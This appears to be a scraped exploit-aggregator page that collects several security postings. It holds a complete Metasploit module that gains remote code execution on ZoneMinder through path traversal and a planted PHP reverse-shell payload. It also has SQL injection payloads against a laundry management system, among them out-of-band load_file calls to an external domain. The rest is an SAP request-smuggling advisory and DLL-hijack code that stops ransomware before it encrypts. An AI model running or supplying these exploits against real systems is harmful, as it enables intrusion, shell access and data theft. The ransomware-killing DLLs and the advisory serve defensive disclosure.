Latest exploits :: CodePwn

<pre><code>Discovery / credits: Malvuln - (John Page - aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/0CFFEE266A8F14103158465E2ECDD2C1.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Trojan.Ransom.Cryptowall Vulnerability: Code Execution Description: Cryptowall looks for and executes DLLs in its current directory. Therefore, we can hijack a vuln DLL, execute our own code, control and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signatures or third-party products, the malwares flaw does the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as there's nothing to kill the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: Cryptowall Type: PE32 MD5: 0CFFEE266A8F14103158465E2ECDD2C1 Vuln ID: MVID-2022-0584 Disclosure: 05/05/2022 Video PoC URL: https://www.youtube.com/watch?v=6G06RCqGIT4 Exploit/PoC: 1) Compile the following C code as "urlmon.dll" 32bit 2) Place the DLL in same directory as the ransomware 3) Optional - Hide it: attrib +s +h "urlmon.dll" 4) Run the malware #include "windows.h" //By malvuln - 5/5/2022 //Purpose: //gcc -c urlmon.c -m32 //gcc -shared -o urlmon.dll urlmon.o -m32 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); TCHAR buf[MAX_PATH]; if(GetCurrentDirectory(MAX_PATH, buf)) if(strcmp("C:\\Windows\\System32", buf) != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).</code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'ZoneMinder Language Settings Remote Code Execution', 'Description' => %q{ This module exploits arbitrary file write in debug log file option chained with a path traversal in language settings that leads to a remote code execution in ZoneMinder surveillance software versions before 1.36.13 and before 1.37.11 }, 'License' => MSF_LICENSE, 'Author' => [ 'krastanoel' ], # Discovery and exploit 'References' => [ [ 'CVE', '2022-29806' ], [ 'URL', 'https://krastanoel.com/cve/2022-29806'] ], 'Platform' => ['php'], 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2022-04-27', 'DefaultTarget' => 0, 'DefaultOptions' => { 'Payload' => 'php/reverse_perl', 'Encoder' => 'php/base64' }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']), OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']), OptString.new('TARGETURI', [true, 'The ZoneMinder path', '/zm/']) ]) end def check res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, '/index.php'), 'method' => 'GET' ) return Exploit::CheckCode::Unknown('No response from the web service') if res.nil? return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200 if res.body =~ /ZoneMinder/ csrf_magic = get_csrf_magic(res) res = authenticate(csrf_magic) if res.body =~ /ZoneMinder Login/ return Exploit::CheckCode::Safe('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>} res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, '/index.php'), 'method' => 'GET', 'keep_cookies' => true ) else return Exploit::CheckCode::Safe('Target is not a ZoneMinder web server') end res.body.match(/v(1.\d+.\d+)/) version = Regexp.last_match(1) unless version return Exploit::CheckCode::Safe('Unable to determine ZoneMinder version') end version = Rex::Version.new(version) return Exploit::CheckCode::Appears("Version Detected: #{version}") if version <= Rex::Version.new('1.37.10') Exploit::CheckCode::Safe("Version Detected: #{version}") rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown('Could not connect to the web service') end def exploit unless datastore['AutoCheck'] cookie_jar.clear res = authenticate fail_with(Failure::NoAccess, 'Authentication failed') if res&.body =~ %r{<title>ZM - Login</title>} end vprint_status('Leak installation directory path') random_path = rand_text_alphanumeric(6..15) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, '/index.php'), 'method' => 'GET', 'keep_cookies' => true, 'vars_get' => { 'view' => random_path } ) fail_with(Failure::UnexpectedReply, 'Failed to leak install path') unless res res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, '/index.php'), 'method' => 'GET', 'keep_cookies' => true, 'vars_get' => { 'view' => 'options' } ) csrf_magic = get_csrf_magic(res) current_lang = res&.get_html_document&.at( 'select[@name="newConfig[ZM_LANG_DEFAULT]"] option[@selected="selected"]' )&.text fail_with(Failure::UnexpectedReply, 'Unable to get current language') if res.nil? || current_lang.nil? data = 'view=request&request=log&task=query&limit=10' data += "&__csrf_magic=#{csrf_magic}" if csrf_magic res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/index.php'), 'data' => data.to_s, 'keep_cookies' => true ) fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response') if res.nil? || res&.body.blank? res.body.match(/(\{"result":.*})/) request_log = JSON.parse(Regexp.last_match(1)).with_indifferent_access if request_log.key?(:rows) # Check for latest version key first v1.36.x request_log_key = 'rows' elsif request_log.key?(:logs) request_log_key = 'logs' else fail_with(Failure::UnexpectedReply, 'Service found, but unable to find request log key') end request_log = request_log[request_log_key].select { |e| e['Message'] =~ /'#{random_path}'/ }.first if request_log path = request_log['File'].split('/')[0..-2].join('/') vprint_good("Path: #{path}") else fail_with(Failure::UnexpectedReply, 'Service found, but unable to leak installation directory path') end fname = "#{rand_text_alphanumeric(6..15)}.php" traverse_path = "#{path}/lang".split('/')[1..].map { '../' }.join shell = "#{traverse_path}tmp/#{fname}" data = "view=options&tab=logging&action=options&newConfig[ZM_LOG_DEBUG]=1&newConfig[ZM_LOG_DEBUG_FILE]=#{shell}" data += "&__csrf_magic=#{csrf_magic}" if csrf_magic res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/index.php'), 'data' => data.to_s, 'keep_cookies' => true ) fail_with(Failure::UnexpectedReply, 'Unable to set LOG_DEBUG_FILE option') if res.nil? || res&.code != 302 vprint_good("Shell: #{shell}") p = %(<?php #{payload.encoded} ?>) data = "view=request&request=log&task=create&level=ERR&message=#{p}&file=#{shell}" data += "&__csrf_magic=#{csrf_magic}" if csrf_magic res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/index.php'), 'data' => data.to_s, 'keep_cookies' => true ) fail_with(Failure::UnexpectedReply, 'Failed to receive a response') unless res result = JSON.parse(res.body)['result'] fail_with(Failure::UnexpectedReply, 'Failed to write payload') unless result fail_with(Failure::UnexpectedReply, 'Unable to write payload to LOG_DEBUG_FILE') if result != 'Ok' # trigger the shell lang = shell.gsub(/\.php/, '') data = "view=options&tab=system&action=options&newConfig[ZM_LANG_DEFAULT]=#{lang}" data += "&__csrf_magic=#{csrf_magic}" if csrf_magic res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/index.php'), 'data' => data.to_s, 'keep_cookies' => true ) fail_with(Failure::UnexpectedReply, 'Unable to trigger the payload') if res.nil? || res&.code != 302 # cleanup data = Rack::Utils.parse_nested_query(data) data['newConfig']['ZM_LANG_DEFAULT'] = current_lang res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/index.php'), 'data' => data.to_query, 'keep_cookies' => true ) vprint_warning('Unable to reset language to default') if res.nil? || res&.code != 200 data['tab'] = 'logging' data['newConfig']['ZM_LOG_DEBUG'] = 0 data['newConfig']['ZM_LOG_DEBUG_FILE'] = '' res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/index.php'), 'data' => data.to_query, 'keep_cookies' => true ) vprint_warning('Unable to reset debug option') if res.nil? || res&.code != 302 rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end private def get_csrf_magic(res) return if res.nil? res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text end def authenticate(csrf_magic = nil) username = datastore['USERNAME'] password = datastore['PASSWORD'] data = "action=login&view=login&username=#{username}&password=#{password}" data += "&__csrf_magic=#{csrf_magic}" if csrf_magic send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/index.php'), 'data' => data.to_s, 'keep_cookies' => true }) end end </code></pre>

<pre><code># Onapsis Security Advisory 2022-0001: HTTP Request Smuggling in SAP Web Dispatcher ## Impact on Business By injecting an HTTP request as a prefix into a victim's request, a malicious user is able to cause damage in different ways, such as producing a Denial of Service by setting an invalid request as a prefix. It is also possible to inject a valid prefixed request that will include the victim's information from its original request. This can be leveraged to perform malicious requests with the victim's credentials or information, or even steal user data. HTTP smuggling can also be combined with other vulnerabilities such as a XSS or reflected content (not vulnerability by itself), by injecting a request to the vulnerable application/web page as a prefix. If the attacker is able to set the prefix of the victim request and also knows a reflected XSS (it can also work with other content reflection), then the response will include a malicious script that will be executed on the victim's browser. This vulnerability is also useful to perform Web Cache Poisoning. The HTTP caches in the different layers will see valid requests for which the response should be stored (considered static), but the actual request is modified by the prefix of the attacker to retrieve another resource, which should not be stored in the cache. As an example, if a user requests an image, the server will probably cache the response as the resource is static. However, if this request is prefixed by another request which returns sensible data, such as personal information, then this response will be stored in the cache. Therefore, when the attacker requests the same image, all the victim's personal information will be retrieved. Finally, a critical information disclosure could end up in session hijacking and further attacks. This can be performed by combining HTTP Desynchronization with Open Redirect, and use the victim's request as the parameter of the redirect location. This would force the victim to send its original request to the attacker, including critical data such as session cookies or query parameters. ## Advisory Information - Public Release Date: 04/05/2022 - Security Advisory ID: ONAPSIS-2022-0001 - Researcher(s): Martin Doyhenard, Yvan Genuer ## Vulnerability Information - Vendor: SAP - Affected Components: - KRNL64NUC 7.22, 7.22EXT, 7.49 - KRNL64UC 7.22, 7.22EXT, 7.49, 7.53 - WEBDISP 7.53, 7.77, 7.81 - KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.83 (Check SAP Note 3080567 for detailed information on affected releases) - Vulnerability Class: CWE-444 - CVSS v3 score: 8.9 AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L - Risk Level: High - Assigned CVE: CVE-2021-38162 - Vendor patch Information: SAP Security NOTE 3080567 ## Affected Components Description The SAP Web dispatcher works as a frontend server between the Internet and one or more backend systems. Which consists of one or more SAP Netweaver ABAP, SAP Netweaver JAVA, SAP HANA, as well as third party application servers. ## Vulnerability Details An HTTP desynchronization vulnerability, TE.CL type is present in SAP Web Dispatcher if the parameter ```wdisp/HTTP/use_pool_for_new_conn``` is enabled. Pool connection related SAP Note : * 2007212 - Tuning SAP Web Dispatcher and ICM for high load * 953784 - SAP Web Dispatcher Connection Pooling If an attacker sends both HTTP headers "Content-Length" (CL) and "Transfer-Encoding" (TE) in the same HTTP request, the SAP Webdispatcher processes the TE header and treats the message body as using chunked encoding. This request is forwarded on to the SAP system ICM service, which processes only the CL header and determines the body size with it. The rest of the request are left unprocessed and the ICM will treat it as being the start of the next request in the sequence. This can be leveraged to gain control of requests issued by other users, and even obtain sensitive information by retrieving the victim's requests and responses. ## Solution SAP has released SAP Note 3080567 which provides patched versions of the affected components. The patches can be downloaded from https://launchpad.support.sap.com/#/notes/3080567. Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. ## Report Timeline - 07/12/2021: Onapsis sends details to SAP - 07/12/2021: SAP provides internal ID - 08/09/2021: Vulnerability in progress - 09/14/2021: SAP releases SAP Note fixing the issue. - 05/04/2022: Advisory Published ## References - Onapsis blogpost: https://www.onapsis.com/blog/sap-security-patch-day-september-2021 - CVE Mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38162 - Vendor Patch: https://launchpad.support.sap.com/#/notes/3080567 ## About Onapsis Research Labs Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. Find all reported vulnerabilities at https://github.com/Onapsis/vulnerability_advisories ## About Onapsis, Inc. Onapsis protects the mission-critical applications that run the global economy, from the core to the cloud. The Onapsis Platform uniquely delivers actionable insight, secure change, automated governance and continuous monitoring for critical systems—ERP, CRM, PLM, HCM, SCM and BI applications—from leading vendors such as SAP, Oracle, Salesforce and others, while keeping them protected and compliant. For more information, connect with us on Twitter or LinkedIn, or visit us at https://www.onapsis.com. -- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited. </code></pre>

<pre><code>## Title: Red Planet Laundry Management System 1.0 SQLi ## Author: nu11secur1ty ## Date: 05.01.2022 ## Vendor: https://laundry.redplanetcomputers.com/ ## Software: https://laundry.redplanetcomputers.com/ ## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-28452 ## Description: The `username` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\266ilbos73q2xlua40ijk4lfv61zp2dtgh84ysn.glupakproZ.com\\wdj'))+' was submitted in the username parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator accounts control and also of all accounts on this system, also the malicious user can download all information about this system. Status: CRITICAL [+] Payloads: ```mysql --- Parameter: username (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: username=admin'+(select load_file('\\\\266ilbos73q2xlua40ijk4lfv61zp2dtgh84ysn.glupakproZ.com\\wdj'))+'' RLIKE (SELECT (CASE WHEN (9687=9687) THEN 0x61646d696e+(select load_file(0x5c5c5c5c323636696c626f7337337132786c75613430696a6b346c667636317a703264746768383479736e2e676c7570616b70726f5a2e636f6d5c5c77646a))+'' ELSE 0x28 END)) AND 'xZRt'='xZRt&password=1234&login=Login Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: username=admin'+(select load_file('\\\\266ilbos73q2xlua40ijk4lfv61zp2dtgh84ysn.glupakproZ.com\\wdj'))+'' AND (SELECT 2011 FROM(SELECT COUNT(*),CONCAT(0x7162787871,(SELECT (ELT(2011=2011,1))),0x716b6b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wmtL'='wmtL&password=1234&login=Login Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin'+(select load_file('\\\\266ilbos73q2xlua40ijk4lfv61zp2dtgh84ysn.glupakproZ.com\\wdj'))+'' AND (SELECT 6418 FROM (SELECT(SLEEP(5)))aYrS) AND 'Cfxg'='Cfxg&password=1234&login=Login --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-28452) ## Proof and Exploit: [href](https://streamable.com/1x4kmo) </code></pre>

<pre><code>Discovery / credits: Malvuln - (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/84c82835a5d21bbcf75a61706d8ab549.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln ISR: ApparitionSec Threat: Ransom.WannaCry Vulnerability: Code Execution Description: WannaCry looks for and executes DLLs in its current directory. Therefore, we can hijack a vuln DLL, execute our own code, control and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signatures or third-party products, the malwares flaw does the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as there's nothing to kill the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: WannaCry Type: PE32 MD5: 84c82835a5d21bbcf75a61706d8ab549 Vuln ID: MVID-2022-0582 Disclosure: 05/03/2022 Video PoC URL: https://www.youtube.com/watch?v=AXD8Lo2jCc0 Exploit/PoC: 1) Compile the following C code as "MSVCP60.dll" 32bit 2) Place the DLL in same directory as the ransomware 3) Optional - Hide it: attrib +s +h "MSVCP60.dll" 4) Run the malware #include "windows.h" //By malvuln //Purpose: Code Execution - Block Encryption //Target: Ransom.WannaCry //MD5: 84c82835a5d21bbcf75a61706d8ab549 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //gcc -c MSVCP60.c -m32 //gcc -shared -o MSVCP60.dll MSVCP60.o -m32 BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); TCHAR buf[MAX_PATH]; GetCurrentDirectory(MAX_PATH, TEXT(buf)); int rc = strcmp("C:\\Windows\\System32", TEXT(buf)); if(rc != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/979635229dfcfae1aae74ae296ec78c8.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: REvil.Ransom Vulnerability: Code Execution Description: REvil looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware pre-encryption. The exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signature or third-party product, the malware will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: REvil Type: PE32 MD5: 979635229dfcfae1aae74ae296ec78c8 SHA256: 03b5a7ffe111cca63fc687a295ba8075087cc90812f6b988797a2d49a5db1482 Vuln ID: MVID-2022-0581 Disclosure: 05/03/2022 Video Poc URL: https://www.youtube.com/watch?v=iN4WaVgEkvs Exploit/PoC: 1) Compile the following C code as "netapi32.dll" 32bit 2) Place the DLL in same directory as the ransomware 3) Optional - Hide it: attrib +s +h "netapi32.dll" 4) Run the malware #include "windows.h" #include "stdio.h" //By malvuln //Purpose: Code Execution //Target: REvil.Ransom //MD5: 979635229dfcfae1aae74ae296ec78c8 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //gcc -c netapi32.c -m32 //gcc -shared -o netapi32.dll netapi32.o -m32 BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); TCHAR buf[MAX_PATH]; GetCurrentDirectory(MAX_PATH, TEXT(buf)); int rc = strcmp("C:\\Windows\\System32", TEXT(buf)); if(rc != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/3c55ee6753408bff2e3e6a392ed9f2a0.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Ransom.Conti Vulnerability: Code Execution Description: Conti looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware pre-encryption. The exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signature or third-party product, the malware will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: Conti Type: PE32 MD5: 3c55ee6753408bff2e3e6a392ed9f2a0 SHA256: 0b0b902af452e1c949a609a3b29a9de21dac639846c77427de06e6e63c1fe904 Vuln ID: MVID-2022-0580 Disclosure: 05/03/2022 Video Poc URL: https://www.youtube.com/watch?v=H8TDDklcrPo Exploit/PoC: 1) Compile the following C code as "netapi32.dll" 2) Place the DLL in same directory as the ransomware 3) Optional - Hide it: attrib +s +h "netapi32.dll" 4) Run the malware #include "windows.h" #include "stdio.h" //By malvuln //Purpose: Code Execution //Target: Ransom.Conti //MD5: 3c55ee6753408bff2e3e6a392ed9f2a0 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //gcc -c netapi32.c -m32 //gcc -shared -o netapi32.dll netapi32.o -m32 BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); TCHAR buf[MAX_PATH]; GetCurrentDirectory(MAX_PATH, TEXT(buf)); int rc = strcmp("C:\\Windows\\System32", TEXT(buf)); if(rc != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).</code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/710a77804637f65e22a2e230ff6444f9.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Conti.Ransom Vulnerability: Code Execution Description: Conti looks for and loads a DLL named "wow64log.dll" in Windows\System32. Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit dll will simply display a Win32API message box and call exit(). Our Conti.Ransom exploit DLL must export "InterlockedExchange" function or it fails with error. We do not need to rely on hash signature or third-party product, the malware will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment. Family: Conti Type: PE32 MD5: 710a77804637f65e22a2e230ff6444f9 SHA256: 0aaacd11d8b956d317489d060e72946d28ab6aef9be1b541aff9904a750f4b51 Vuln ID: MVID-2022-0579 Disclosure: 05/03/2022 Video PoC URL: https://www.youtube.com/watch?v=owsev3YTkWA Exploit/PoC: 1) Compile the following C code as "wow64log.dll" as x64 2) Copy the DLL in Windows/System32 3) Run the malware and BOOM! #include "windows.h" #include "stdio.h" //By malvuln - 5/2022 //MD5: 710a77804637f65e22a2e230ff6444f //TARGET: Conti.Ransom /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //gcc -c wow64log.c //gcc -shared -o wow64log.dll wow64log.o //must live under Windows/System32 dir BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Code Exec", "by malvuln", MB_OK); exit(0); break; } return TRUE; } extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange (LONG volatile *Target, LONG Value){ exit(1); } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>